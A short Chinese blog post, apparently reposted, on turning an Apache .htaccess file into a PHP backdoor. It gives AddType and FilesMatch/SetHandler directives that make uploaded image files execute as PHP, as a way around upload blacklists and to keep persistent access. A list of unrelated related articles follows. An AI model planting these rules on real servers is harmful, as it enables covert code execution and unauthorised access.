.htaccess文件构成的PHP后门

原創 浅笑⁹⁹⁶ 2020-07-01 17:17

1、.htaccess文件

2、文件上传绕过

一般.htaccess可以用来留后门和针对黑名单绕过

创建一个txt写入(png解析为php)

AddType application/x-httpd-php .png

另存为.htaccess

上传.htaccess 必须是网站根路径

3、留后门

可以在.htaccess 加入php解析规则

类似于把文件名包含1的解析成php

<FilesMatch "1"> 
SetHandler application/x-httpd-php 
</FilesMatch>

123456.png  就会以php执行

参考文章:

https://www.cnblogs.com/hmbb/p/9689436.html4

https://www.cnblogs.com/feizianquan/p/11109390.html

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

.user.ini文件构成的PHP后门

.user.ini。它比.htaccess用的更廣,不管是nginx/apache/IIS,只要是以fastcgi運行的php都可以用這個方法。我的nginx服務器全部是fpm/fastcgi,我的IIS php5.3以上的全部用的fas

浅笑⁹⁹⁶ 2020-07-01 17:17:22

Web基础--Bootstrap

Xzzz2020 2020-02-23 18:30:54

XML

Xzzz2020 2020-02-23 18:30:54

Web基础--JSP

Xzzz2020 2020-02-23 18:30:54

Tomcat

Xzzz2020 2020-02-23 18:30:54

HTTP&Response

Xzzz2020 2020-02-23 18:30:54

HTTP&Request

Xzzz2020 2020-02-23 18:30:54

Web基础--JDBC

Xzzz2020 2020-02-23 18:30:54

Web基础--Filter&Listener

Xzzz2020 2020-02-23 18:30:54

Web基础--Java会话技术

Xzzz2020 2020-02-23 18:30:54

.user.ini文件构成的PHP后门

.user.ini。它比.htaccess用的更廣,不管是nginx/apache/IIS,只要是以fastcgi運行的php都可以用這個方法。我的nginx服務器全部是fpm/fastcgi,我的IIS php5.3以上的全部用的fas

浅笑⁹⁹⁶ 2020-07-01 17:17:22

echarts3 标线markLine

echarts3 標線markLine實例代碼 實例代碼 markLine: { itemStyle: { normal: { lineStyle: { type: 'solid', color:'#

bellus- 2020-06-24 17:07:05

20个软件测试工具大放送

20個軟件測試工具大放送Web應用測試工具1.JMeter2.NeoLoad3.LoadRunner4.LoadUI5.Loadster6.Load impact7.Wapt8.Qtest9.httperf10.Telerik11

bellus- 2020-06-24 17:07:05

echarts 3 动态显示最近一天数据,以分为单位获取数据点

echarts 3 動態顯示最近一天數據,以分爲單位獲取數據點實例代碼 實例代碼 <!DOCTYPE html> <html style="height: 100%"> <head> <meta charset

bellus- 2020-06-24 17:07:05

get方法和post方法

get方法,會直接將數據添加到地址欄中,透明傳輸,有大小限制

Alex白给 2020-06-18 23:38:09